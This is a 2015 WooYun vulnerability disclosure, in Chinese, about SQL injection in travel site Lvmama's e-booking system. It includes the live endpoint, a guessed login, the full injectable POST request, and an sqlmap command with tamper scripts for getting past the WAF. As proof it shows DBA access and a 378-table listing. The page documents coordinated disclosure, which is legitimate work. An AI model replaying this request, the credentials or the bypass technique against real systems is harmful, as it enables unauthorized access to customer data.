当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144854

漏洞标题:驴妈妈旅游网某站SQL注入(tamper绕waf/DBA权限/27个库)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_夏洛克

提交时间:2015-10-05 09:51

修复时间:2015-11-22 11:10

公开时间:2015-11-22 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-05: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

驴妈妈的旧的订票系统:http://e.lvmama.com/ebooking/login.do

网站.png


之前这个站也存在注入
驴妈妈旅游网某系统SQL注入导致大量数据库可脱(数百万客户、订单、优惠券等信息)
驴妈妈全部订单信息泄漏 等等
,数据还不少,大量客户信息,现在网站加了waf等过滤
先试出一个账号lvmama/123456
进入后经过一番尝试并没有发现问题,终于在这个输入框找到了注入

注入页面_没报错.png


单引号尝试,报错

报错.png


POST /ebooking/eplace/queryPassPort.do HTTP/1.1
Host: e.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://e.lvmama.com/ebooking/eplace/queryPassPort.do
Cookie: JSESSIONID=2DAFEACDCFB6842381226DA4F72FA94C; uid=wKgKcFYCKIYO5y3EBiWJAg==; CoreID6=31035080103514429822001&ci=90409730; 
__utma=30114658.668587984.1442982203.1443097311.1443859360.4; __utmz=30114658.1442982203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442982203,1443073015; tma=30114658.15709036.1442982214458.1443073018835.1443859361502.3; tmd=88.30114658.15709036.1442982214458.; 
bfd_g=8a7bc81f66bd068d00000d6800522f5955b9c4a4; _lvTrack_UUID=EC5FD902-8675-4D0B-839C-61604B7CFCF6; __xsptplus443=443.1.1442982351.1442982351.1%234%7C%7C%7C%7C%7C
%23%230t256dYDWHuIjbJceH1Nm1zA8T-Ejs2i%23; __utmc=30114658; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1443859384; lvsessionid=5cbb21df-3c02-4695-8732-790569678feb_16053546; 
vst_ebk_sessionid=261b0614-f635-4c92-9f84-d9cad9b12bb9
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
port_orderId=123&port_mobile=&port_userName=*&port_passPort=


port_userName存在注入
但是sqlmap却注不出数据,回过头来检查下,发现有过滤,将空格和一些关键词过滤了

过滤提示.png


于是就想到用tamper绕过这些过滤,用/**/替换空格,随机大小写这些脚本,可以绕过过滤

python sqlmap.py -r 1.txt --tamper between.py,space2comment.py,randomcase.py


space2comment.py 用/**/替换空格,randomcase.py 随机大小写

漏洞证明:

注入点

注入点.png


27个数据库

dbs.png


dba权限

dba.png


当前库中378个表

web application technology: JSP
back-end DBMS: Oracle
Database: LVMAMA_SUPER
[378 tables]
+--------------------------------+
| ABROADHOTEL_CITY               |
| ABROADHOTEL_ORD_HOTEL          |
| ABROADHOTEL_ORD_ORDER          |
| ABROADHOTEL_ORD_PERSON         |
| ABROADHOTEL_ORD_REFUNDMENT     |
| ABROADHOTEL_ORD_ROOM           |
| ABROADHOTEL_ORD_SALE_SERVICE   |
| ABROADHOTEL_SALE_SERVICE_DEAL  |
| APPLY_CITY                     |
| AUTH_GROUPS                    |
| AUTH_GROUPS_REPORT             |
| AUTH_GROUPS_RESOURCES          |
| AUTH_RESOURCES                 |
| AUTH_USERS                     |
| AUTH_USERS_GROUPS              |
| BOC_RECORD                     |
| BONUS_CONFIG                   |
| BOUNS_RETURN_SCALE             |
| CK_DEVICE_INFO                 |
| CK_DEVICE_PRINT_INFO           |
| CK_DEVICE_PRODUCT              |
| CLIENT_ORDER_REPORT            |
| COM_AFFIX                      |
| COM_AMQ_MESSAGE                |
| COM_ANNOUNCEMENT               |
| COM_AUDIT                      |
| COM_CITY                       |
| COM_CITY_AREA_GROUP            |
| COM_CLIENT_ACT                 |
| COM_CLIENT_LOG                 |
| COM_CODE                       |
| COM_CODE_SET                   |
| COM_CONDITION                  |
| COM_EMAIL_TEMPLATE             |
| COM_FAX_STRATEGY               |
| COM_FAX_TEMPLATE               |
| COM_IPS                        |
| COM_JOB_CONTENT                |
| COM_LOG                        |
| COM_LOG_CONTENT                |
| COM_LOG_HIS                    |
| COM_MESSAGE                    |
| COM_MESSAGE_RECEIVERS          |
| COM_PROVINCE                   |
| COM_SEARCH_INFO_UPDATE         |
| COM_SEQ_NO                     |
| COM_SMS                        |
| COM_SMS_HISTORY                |
| COM_SMS_TEMPLATE               |
| COM_TABLES                     |
| COM_TASK                       |
| COM_TASK_LOG                   |
| COUPON_TEMP_ALL                |
| DISTRIBUTION_BAIDU_CITY        |
| DISTRIBUTION_BAIDU_TUANGOU     |
| DISTRIBUTION_MESSAGE           |
| DISTRIBUTION_ORDER_REFUND      |
| DISTRIBUTION_PRODUCT           |
| DISTRIBUTION_PROD_CATEGORY     |
| DISTRIBUTION_PROD_RAKEBACK     |
| DISTRIBUTION_TUAN_COUPON       |
| DISTRIBUTION_TUAN_COUPON_BATCH |
| DISTRIBUTION_TUAN_DESTROY_LOG  |
| DISTRIBUTOR_360                |
| DISTRIBUTOR_AGREEMENT_DETAIL   |
| DISTRIBUTOR_INFO               |
| DISTRIBUTOR_IP                 |
| DISTRIBUTOR_PROD_BLACKLIST     |
| DISTRIBUTOR_TUAN_INFO          |
| DIST_META_TIME_PRICE           |
| DIST_PROD_TIME_PRICE           |
| EBK_ANNOUNCEMENT               |
| EBK_CERTIFICATE                |
| EBK_CERTIFICATE_ITEM           |
| EBK_EXTRA_PROD_CONFIG          |
| EBK_FAX_SEND                   |
| EBK_FAX_TASK                   |
| EBK_HOUSE_PRICE                |
| EBK_MULTI_JOURNEY              |
| EBK_ORDER_DATA_REV             |
| EBK_PERFORM_LOG                |
| EBK_PERMISSION                 |
| EBK_PROD_BRANCH                |
| EBK_PROD_CONTENT               |
| EBK_PROD_JOURNEY               |
| EBK_PROD_MODEL_PROPERTY        |
| EBK_PROD_PLACE                 |
| EBK_PROD_PRODUCT               |
| EBK_PROD_REJECT_INFO           |
| EBK_PROD_RELATION              |
| EBK_PROD_SNAPSHOT              |
| EBK_PROD_TARGET                |
| EBK_PROD_TIME_PRICE            |
| EBK_TASK                       |
| EBK_USER                       |
| EBK_USER_META_BRANCH           |
| EBK_USER_PERMISSION            |
| EBK_USER_TARGET                |
| EDM_SUBSCRIBE                  |
| EDM_SUBSCRIBE_BATCH            |
| EDM_SUBSCRIBE_BATCH_JOB        |
| EDM_SUBSCRIBE_INFO             |
| EDM_SUBSCRIBE_TASK             |
| EDM_SUBSCRIBE_TEMPLATE         |
| EDM_SUBSCRIBE_USER_GROUP       |
| EPLACE_SUPPLIER                |
| FINC_ADVANCEDEPOSITS           |
| FINC_BANK                      |
| FINC_BRANCH_BANK               |
| FINC_CITY                      |
| FINC_DEPOSIT                   |
| FINC_DEPOSIT_USAGE             |
| FINC_FOREGIFTS                 |
| FINC_MONEY_DRAW_ITEM           |
| FINC_PROVINCE                  |
| FIN_CURRENCY                   |
| FIN_EXCHANGE_RATE              |
| FIN_GROUP_SETTLEMENT           |
| FIN_INVOICE                    |
| FIN_INVOICE_AMOUNT             |
| FIN_INVOICE_LINK               |
| FIN_RECON_BOC_FILES            |
| FIN_SUPPLIER_ALLOT             |
| GROUP_DREAM                    |
| GROUP_DREAM_SUBMITTER          |
| GROUP_TRAVEL_TEMPLATE          |
| INFO_HOT_PRODUCT               |
| INFO_NORMAL_QUES               |
| INFO_PRODUCT_INFO              |
| INFO_QUES_COUNT                |
| INFO_QUES_URGENT               |
| INS_INSURANT                   |
| INS_POLICY_INFO                |
| INS_POLICY_OPERATION_LOG       |
| LIMIT_SALE_TIME                |
| LINE_INFO                      |
| LINE_INFO_RELATION             |
| LINE_STATION                   |
| LINE_STATION_STATION           |
| LINE_STOPS                     |
| LINE_STOP_VERSION              |
| MARK_ACTIVITY                  |
| MARK_ACTIVITY_BLACKLIST        |
| MARK_ACTIVITY_ITEM             |
| MARK_ACTIVITY_SEND_LOG         |
| MARK_BONUS_COUPONS             |
| MARK_BONUS_COUPONS_ITEM        |
| MARK_BONUS_COUPONS_SEND_LOG    |
| MARK_CODE_TEMP                 |
| MARK_COUPON                    |
| MARK_COUPON_CODE               |
| MARK_COUPON_PRODUCT            |
| MARK_COUPON_RELATE_USER        |
| MARK_COUPON_USAGE              |
| MARK_DIST_CHANNEL              |
| MARK_ORDER_COUPON_RULE         |
| META_PRODUCT                   |
| META_PRODUCT_BRANCH            |
| META_PRODUCT_CONTROL           |
| META_PRODUCT_HOTEL             |
| META_PRODUCT_OTHER             |
| META_PRODUCT_PLACE             |
| META_PRODUCT_ROUTE             |
| META_PRODUCT_TICKET            |
| META_PRODUCT_TRAFFIC           |
| META_TIME_PRICE                |
| META_TRAVEL_CODE               |
| MOBILE_AREA_QUERY              |
| MOVE_BRANCH_INFO               |
| MOVE_META_PRODUCT_BRANCH       |
| MOVE_PROD_PRODUCT_BRANCH       |
| MOVE_TIME_PRICE                |
| NC_COMPLAINT                   |
| NC_COMPLAINT_DUTY              |
| NC_COMPLAINT_DUTY_DETAILS      |
| NC_COMPLAINT_REMIND            |
| NC_COMPLAINT_RESULT            |
| NC_COMPLAINT_ROLE              |
| NC_COMPLAINT_TRACKING          |
| NC_COMPLAINT_TYPE              |
| OP_COSTS_ITEM                  |
| OP_GROUP_BUDGET                |
| OP_GROUP_BUDGET_FIXED          |
| OP_GROUP_BUDGET_PROD           |
| OP_OTHER_INCOMING              |
| OP_TRAVEL_GROUP                |
| ORD_BATCH                      |
| ORD_BATCH_ORDERS               |
| ORD_CONTRACT                   |
| ORD_DEDUCT_DETAIL              |
| ORD_ECONTRACT                  |
| ORD_ECONTRACT_BACKUP_FILE      |
| ORD_ECONTRACT_COMMENT          |
| ORD_ECONTRACT_LOG              |
| ORD_ECONTRACT_SIGN_LOG         |
| ORD_EXPRESS                    |
| ORD_FAX_RECV                   |
| ORD_FAX_RECV_LINK              |
| ORD_FAX_SEND                   |
| ORD_FAX_TASK                   |
| ORD_FAX_TASK_SEND              |
| ORD_INVOICE                    |
| ORD_INVOICE_RELATION           |
| ORD_ORDER                      |
| ORD_ORDER_AMOUNT_APPLY         |
| ORD_ORDER_AMOUNT_ITEM          |
| ORD_ORDER_BLACK                |
| ORD_ORDER_CHANNEL              |
| ORD_ORDER_DISTRIBUTION         |
| ORD_ORDER_FOR_PAYMENT_SMS      |
| ORD_ORDER_HOTEL                |
| ORD_ORDER_ITEM_META            |
| ORD_ORDER_ITEM_META_APERIODIC  |
| ORD_ORDER_ITEM_META_TIME       |
| ORD_ORDER_ITEM_PROD            |
| ORD_ORDER_ITEM_PROD_TIME       |
| ORD_ORDER_MEMO                 |
| ORD_ORDER_PARENT               |
| ORD_ORDER_ROUTE                |
| ORD_ORDER_ROUTE_TRAVEL         |
| ORD_ORDER_SHHOLIDAY            |
| ORD_ORDER_STATUS               |
| ORD_ORDER_TRACK                |
| ORD_ORDER_TRAFFIC              |
| ORD_ORDER_TRAFFIC_REFUND       |
| ORD_ORDER_TRAFFIC_TICKET_INFO  |
| ORD_PERFORM                    |
| ORD_PERSON                     |
| ORD_REFUNDMENT                 |
| ORD_REFUNDMENT_EVENT           |
| ORD_REFUNDMENT_ITEM            |
| ORD_REFUNDMENT_ITEM_PROD       |
| ORD_REFUND_APPLY               |
| ORD_SALE_SERVICE               |
| ORD_SALE_SERVICE_DEAL          |
| ORD_SETTLEMENT                 |
| ORD_SETTLEMENT_CHANGE          |
| ORD_SETTLEMENT_PAYMENT         |
| ORD_SETTLEMENT_PRICE_RECORD    |
| ORD_SETTLEMENT_QUEUE           |
| ORD_SETTLEMENT_QUEUE_ITEM      |
| ORD_SUB_SETTLEMENT             |
| ORD_SUB_SETTLEMENT_ITEM        |
| ORD_TMALL_DISTRIBUTOR_MAP      |
| ORD_TMALL_MAP                  |
| ORD_TMALL_MAP_RESEND           |
| ORD_TRANSACTION                |
| ORD_USER_ORDER                 |
| OVER_RIGHTS_CHECK              |
| OVER_RIGHTS_USER               |
| PASSPORT_MESSAGE               |
| PASS_CODE                      |
| PASS_DEVICE                    |
| PASS_EVENT                     |
| PASS_ORDER_ITEM                |
| PASS_PORT_AUTH_RESOURCES       |
| PASS_PORT_CODE                 |
| PASS_PORT_LOG                  |
| PASS_PORT_USER                 |
| PASS_PRODUCT                   |
| PASS_PROVIDER                  |
| PERM_AUDIT_TASK                |
| PERM_FINAL_AUDIT_TASK          |
| PROCEED_TOURS                  |
| PRODUCT_CONTROL_ROLE           |
| PRODUCT_COUNT                  |
| PRODUCT_GROUP                  |
| PRODUCT_PRODUCT_PLACE          |
| PRODUCT_PROPERTY_SEARCH_INFO   |
| PRODUCT_SEARCH_INFO            |
| PRODUCT_TOP_COUNT              |
| PROD_ASSEMBLY_POINT            |
| PROD_AVAILABLE_BONUS           |
| PROD_BRANCH_SEARCH_INFO        |
| PROD_B_CERTIFICATE             |
| PROD_CHANNEL                   |
| PROD_CHANNEL_SMS               |
| PROD_CONTAINER                 |
| PROD_CONTAINER_FROM_PLACE      |
| PROD_CONTAINER_PRODUCT         |
| PROD_CONTAINER_PRODUCT_QGB     |
| PROD_CONTAINER_SQL             |
| PROD_COUNT_FACTOR              |
| PROD_COUPON_INTERVAL           |
| PROD_ECONTRACT                 |
| PROD_HOTEL                     |
| PROD_HOT_SELL_SEQ              |
| PROD_JOURNEY_PACK              |
| PROD_JOURNEY_PRODUCT           |
| PROD_MODEL_PROPERTY            |
| PROD_MODEL_TYPE                |
| PROD_OTHER                     |
| PROD_PACK_JOURNEY              |
| PROD_PLACE_TAG                 |
| PROD_PRODUCT                   |
| PROD_PRODUCT_BRANCH            |
| PROD_PRODUCT_BRANCH_ITEM       |
| PROD_PRODUCT_CHANNEL           |
| PROD_PRODUCT_ITEM              |
| PROD_PRODUCT_JOURNEY           |
| PROD_PRODUCT_MODEL_PROPERTY    |
| PROD_PRODUCT_PLACE             |
| PROD_PRODUCT_RELATION          |
| PROD_PRODUCT_ROYALTY           |
| PROD_PRODUCT_TAG               |
| PROD_RELATION                  |
| PROD_ROUTE                     |
| PROD_TAG                       |
| PROD_TAG_GROUP                 |
| PROD_TICKET                    |
| PROD_TIME_PRICE                |
| PROD_TRAFFIC                   |
| PROD_TRAIN_FETCH_INFO          |
| RPT_QUERY                      |
| SALES_TUAN_SECKILL_INFO        |
| SENSITIVE_WORD                 |
| SET_TRANSFER_TASK              |
| SUPPLIER_PROD                  |
| SUPPLIER_RELATE_PRODUCT        |
| SUPPLIER_VIEW_CONTENT          |
| SUPPLIER_VIEW_JOURNEY          |
| SUPP_GOODS_COUNT               |
| SUPP_GOODS_COUNT_CANCEL        |
| TAOBAO_PRODUCT_DETAILS         |
| TAOBAO_PRODUCT_INTERFACE       |
| TAOBAO_PRODUCT_SYNC            |
| TAOBAO_PRODUCT_SYNC_LOG        |
| TAOBAO_TICKET_SKU              |
| TAOBAO_TRAVEL_COMBO            |
| TAOBAO_TRAVEL_COMBO_TYPE       |
| TEMP_ACTIVE_SESSION            |
| TEMP_CABI0612                  |
| TEMP_COUPON                    |
| TEMP_INSERT                    |
| TEMP_MARK_COUPON_CODE_FIXED    |
| TEMP_MARK_COUPON_CODE_FIXED1   |
| TEMP_MARK_COUPON_CODE_FIXED2   |
| TEMP_ORD_TMALL_MAP_HIS         |
| TEMP_PD                        |
| TEMP_SALE_UNIT                 |
| TEMP_SALE_UNIT2                |
| TEMP_SALE_UNIT3                |
| TEMP_SESSION_RAC1              |
| TEMP_SESSION_RAC2              |
| TEMP_SESSION_RAC3              |
| TEMP_SG                        |
| TEMP_SUPP_GOODS_BU             |
| TEMP_VST_SEARCH                |
| TEM_COM_SMS                    |
| TOAD_PLAN_TABLE                |
| TOTAL_STOCK                    |
| TRACK_LOG                      |
| TRAVEL_TIPS                    |
| TUAN_BATCH_LIMIT               |
| UNITY_ORDER                    |
| UNITY_ORDER_EXPAND             |
| UNITY_ORDER_ITEM               |
| UNITY_PASS_CODE                |
| UNITY_PASS_PORT_CODE           |
| UNITY_PRODUCT                  |
| UNITY_PRODUCT_BRANCH           |
| UNITY_PRODUCT_DATE             |
| UNITY_PRODUCT_PLACE            |
| UNITY_PROD_BRANCH_DIST_PRICE   |
| USER_ACTION_COLLECTION         |
| USER_ADDRESS                   |
| USER_RELATE_MENU               |
| USER_RELATE_SUPPLIER_PRODUCT   |
| VIEW_CONTENT                   |
| VIEW_JOURNEY                   |
| VIEW_JOURNEY_CONTENT           |
| VIEW_JOURNEY_PLACE             |
| VIEW_MULTI_JOURNEY             |
| VIEW_PAGE                      |
| VIEW_PAGE_TAG                  |
| VIEW_TAG                       |
| VIEW_TIP                       |
| VIEW_TRAVEL_TIPS               |
+--------------------------------+


不继续深入了

修复方案:

增强过滤规则

版权声明:转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 11:08

厂商回复:

thx

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-05 09:55 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    绕绕绕

  2. 2015-10-05 11:23 | Xmyth_夏洛克 ( 普通白帽子 | Rank:1083 漏洞数:122 | 啥都不会)

    @疯狗 2333333

  3. 2015-10-05 13:30 | 心云 ( 实习白帽子 | Rank:58 漏洞数:23 | 遇见)

    你关注的白帽子 Xmyth_夏洛克 发表了漏洞 驴妈妈旅游网某站SQL注入(tamper绕waf/DBA权限